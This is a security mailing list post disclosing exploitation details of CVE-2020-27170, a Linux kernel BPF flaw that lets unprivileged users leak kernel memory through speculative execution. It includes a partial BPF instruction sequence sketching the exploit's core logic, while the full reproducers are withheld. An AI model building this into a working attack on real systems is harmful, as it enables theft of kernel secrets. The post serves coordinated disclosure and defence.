Date: Wed, 24 Mar 2021 19:34:50 +0000 From: Piotr Krysiuk <piotras@...il.com> To: oss-security@...ts.openwall.com Subject: Re: [CVE-2020-27170] Protection against speculatively out-of-bounds loads in the Linux kernel can be bypassed by unprivileged local users to leak content of kernel memory Some details of how CVE-2020-27170 could be exploited in practice were provided via linux-distros mailing list with 7 days embargo. This was intended to help any affected Linux distributions to assess the risk and decide about any appropriate actions. As the embargo expires today, I was asked to share these details publically on oss-security. The CVE-2020-27170 vulnerability has been successfully reproduced against Linux kernel v5.12-rc3 using the following logic for BPF program attached to a socket: load bpf_context pointer (BPF_REG_1) into BPF_REG_CTX, load pointer to our big array into BPF_REG_MAP_PTR, load offset of data to leak into BPF_REG_OFFSET, // load any slowly-loaded value... BPF_LDX_MEM(BPF_DW, BPF_REG_SLOW_CHECK, BPF_REG_MAP_PTR, 0x1200), // ... and turn it into known zero for verifier, // while preserving slowly-loaded dependency for affected hardware BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 1), BPF_ALU64_IMM(BPF_AND, BPF_REG_SLOW_CHECK, 2), // speculatively bypassed offset check BPF_JMP_REG(BPF_JNE, BPF_REG_OFFSET, BPF_REG_SLOW_CHECK, skip_speculation), // speculatively unbounded pointer arithmetic BPF_ALU64_REG(BPF_ADD, BPF_REG_CTX, BPF_REG_OFFSET), // speculatively unbounded load BPF_LDX_MEM(BPF_W, BPF_REG_LEAKED_WORD, BPF_REG_CTX, offsetof(struct __sk_buff, protocol)), transmit speculatively loaded BPF_REG_LEAKED_WORD via side-channel, The full reproducers were shared with a number of Linux distributions for protection purposes.
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.